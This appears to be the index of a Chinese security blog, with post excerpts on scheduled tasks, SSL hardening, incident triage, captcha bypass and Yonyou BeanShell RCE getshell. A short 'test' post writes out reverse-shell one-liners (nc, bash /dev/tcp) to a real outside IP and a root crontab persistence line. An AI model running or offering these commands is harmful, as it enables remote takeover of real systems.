计划任务的隐藏与排查
计划任务的隐藏与排查0x1-创建使用ax.exe和schtasks.exe。win8之后都用schticks.txt,at.exe被废弃,主要讲schtasks.exe。
schtasks.exe 是一个 Windows 命令行工具,用于创建、删除、查询、更改、运行和结束计划任务。以下是其详细的用法和参数介绍:
基本命令结构
schtasks /create:创建新任务。
schtasks /delete:删除任务。
schtasks /query:显示任务的信息。
schtasks /change:更改任务的属性。
schtasks /run:立即运行任务。
schtasks /end:结束正在运行的任务。
/create 参数
/tn:任务名称。
/tr:执行的任务动作(例如程序路径)。
/sc:任务计划类型(比如一次性、每日、每周等)。
频率最小是每分,最大是每月
MINUTE:按分钟计划任务。可与 /mo 参数结合使用,指定分钟间隔。
HOURLY:按小时计划任务。可与 /mo 参数结合使用,指定小时间隔。
DAILY:按天计划任务。可与 /mo 参数结合使用,指定天数间隔。 ...
无题
介绍代码审计的背景、目的和主要目标。简洁明了,为听众提供审计的背景信息。
说明使用的审计工具和技术,以及审计流程的各个步骤
展示审计过程中发现的主要问题,包括代码质量和安全漏洞。
对发现的问题进行风险评估,包括风险级别和潜在影响分析
针对发现的问题提出改进建议和实施最佳实践的方式。
总结审计的主要发现和建议,并提出后续的行动计划
问答环节
kali升级bug
Parallels虚拟机kali内核升级bug情况有点小菜又喜欢折腾和尝鲜,看到kali发布了新版本,就想着升级一下。
很常规的操作,疏忽没有做快照。升级到一半出现bug,意思到出bug的瞬间,第一时间光速做了快照。
当时情况:所有命令可正常使用,系统锁定之后无法解锁,重启之后无法加载系统。
使用 apt update && apt -f full-upgrade最终报错
重新启动后报错,无法进入系统
执行**apt update ** 显示正常
分析询问gptgpt是是一个很方便,又很可怕的工具。直接将报错丢给他,回答的很好也很全面
但是很可惜的是并没有解决问题,依旧无法成功更新。在这里卡了很久
询问群友在此特别感谢一下p神的知识星球,微信群的氛围特别好。有很多人帮我分析,解决问题,让我找回了初心和正确的解决方案
有很多人给了很多建议,我把其中的知识点整理了一下
列出所有已经安装的内核1dpkg --list | grep linux-image
第一列的ii,if,iu代表不同的意义
123ii:已安装被配置if:已安装但处于不一致的状态。可能是由于中断 ...
安全加固
水洞的安全加固日常工作中,有些漏洞利用难度大、场景要求苛刻、或者难以修复,但是漏洞级别是高危中危。这类常被用来水报告,应付交差。最近杭州举行亚运会,接上级单位要求:修复所有已知漏洞。那就开始干活。
SSL系列概述此系列包括
SL/TLS 存在Bar Mitzvah Attack漏洞
SSLv3 存在严重设计缺陷漏洞
SSL 3.0 deprecated protocol
不同扫描器的漏洞描述各有不同,大概都是
远程主机支持具有弱或不安全属性的 TLS/SSL 密码套件。
SSLv3漏洞(CVE-2014-3566),该漏洞贯穿于所有的SSLv3版本中,利用该漏洞,黑客可以通过中间人攻击等类似的方式(只要劫持到的数据加密两端均使用SSL3.0),便可以成功获取到传输数据(例如cookies)。针对此漏洞,需要服务器端和客户端均停用SSLv3协议。
该漏洞是由功能较弱而且已经过时的RC4加密算法中一个问题所导致的。它能够在某些情况下泄露SSL/TLS加密流量中的密文,从而将账户用户名密码、信用卡数据和其他敏感信息泄露给黑客。
LOGJAM 攻击是 ...
查找pid
很多情况下的很多操作,都需要pid。但是在受限环境下,查找pid是一个困难的事情。
站在p神的的肩膀上,记录一下如何解决。
linux的本质是一个文件系统,一切命令的来源都可以是文件。
一读取 /proc/net/tcp文件,拿到服务器上所有TCP连接,找到我们需要的端口号。
1cat /proc/net/tcp
ex:
0016对应对就是22号端口,对应的inode号是15437。
二linux下socket也是文件,通过列出计算机上所有文件描述符对应的inode。
1ls -ali /proc/*/fd/
我们需要查找inode号是15437,找到对应的。
然后使用ps 命令就可以看到对应的pid了
1ps aux |grep 725
1576571
漏洞利用
用友ncbeanshell远程代码-新姿势注明仅供研究,禁止用于非法攻击,如果用于非法攻击于本人无关之类的
简单介绍 2021年06月03日,用友官方发布了用友BeanShell远程代码执行漏洞的风险通告,漏洞编号为CNVD-2021-30167,漏洞等级:严重,漏洞评分:9.89
这是一个很老的洞了,已经有2年了。网上很多博客的复现都是浅尝而止,执行一个pwd()。在实际攻防演练中,李四如何通过此漏洞getshell呢?理论上是可以getshell的
访问漏洞存在的地址,会有一个框,可以执行命令。
可以执行pwd();dir()等命令,似乎并不能拿到shell。
何为BeanShell? 李四注意到 标题,这是一个beanshell。
Beanshell(BeanShell)是一种轻量级的Java脚本语言,它允许在Java应用程序中动态执行Java代码。Beanshell提供了一种简单的方式来编写和执行Java代码片段,而无需进行繁琐的编译和构建过程。它可以作为一个独立的解释器使用,也可以嵌入到Java应用程序中作为脚本引擎使用。
BeanShell可以 ...
应急响应
日常分析-态感告警 越来越多的企业会部署态势感知,作为监测自己网络安全的一个工具。各大安全厂商也都在努力的发展智能化的态势感知,比如自动封禁IP等。但是对于某些告警,还是需要人结合实际情况进行研判。今天就讲一个小例子。
发现告警 hv前期,张三公司部署了态势感知。李四作为安全人员协助查看态感日志。李四发现,10.20.22.22的IP连续多天向外请求可疑域名
分析处置 发现告警之后,第一时间要冷静,越慌张越容易出错。同时任何时候都不能轻易的下结论:系统被入侵了or是误报。作为安全人员,给出的结论必须是经过严谨的分析,有据可依的。
为了 隐私,仅列出部分:向外请求:dinobro.com,请求IP: 154.93.242.219。
首先查询一下态感中显示请求的ip和域名
1向外请求:dinobro.com,请求IP: 154.93.242.219
dinobro.com(恶意)
154.93.242.219(恶意)
通过安恒星图查询,发现均为恶意高危资产。类似的域名和请求还有很多很多
被打进来了? 到这里,李四心里也是突突的:一开始就 ...
测试
测试文档使用文档1.新建文档
1hexo new filename title
2.启动项目
1hexo server
离月
1nc -e /bin/bash 123.207.198.158 58505
1bash -i >& /dev/tcp/123.207.198.158/58505 0>&1
1echo '* * * * * /bin/bash -i >& /dev/tcp/123.207.198.158/58506 0>&1' >> /mnt/var/spool/cron/crontabs/root
1git clone https://github.com/gebl/dirtycow-docker-vdso.gitcd dirtycow-docker-vdso/sudo docker-compose run dirtycow /bin/bash
验证码绕过
验证码绕过简介🤩现在的网站大多都有验证码的存在,系统的安全性得到进一步保障。但攻防永远都是一个对抗的过程,此文章就谈一谈如何对验证码进行绕过。
工具
burpsuite
ddddocr
captcha-killer
python
dddocrddddocr 是一个由sml2h3开发的专为验证码厂商进行对自家新版本验证码难易强度进行验证的一个python库。
python<=3.9直接用命令 pip install ddddocr 进行安装(笔者测试支持m1,2022年11月24号)
项目地址:https://github.com/sml2h3/ddddocr
captcha-killercaptcha-killer是一个burpsuite的插件,captcha-killer本身无法识别验证码,它专注于对各种验证码识别接口的调用
项目地址:https://github.com/c0ny1/captcha-killer
这个插件安装需要注意,如果burpsuite的版本在2020版之前,可以到上面的项目地址进行下载,但如果burpsuite版本在2020版及之后,则 ...
信息收集工具-水泽
介绍水泽是一个信息收集自动化工具,用来资产收集非常好用,python开发。本文主要介绍一下如何安装配置使用。
https://github.com/0x727/ShuiZe_0x727
安装github项目说的很多也很清楚,但是我自己理了一下。安装运行build.sh 即可,如果怕遇到问题或者省事直接上docker,其实更慢整个过程下来(网络问题)。
问题问题-1crypto本人环境
1python 3.9 Anaconda
运行shuize.py时发生报错
123456789101112131415161718192021222324252627282930Traceback (most recent call last): File "/xxxxxxxx/ShuiZe_0x727/ShuiZe.py", line 1642, in <module> _init() File "/xxxxxxxx/ShuiZe_0x727/ShuiZe.py", line 1555, in _init run_subdomain( ...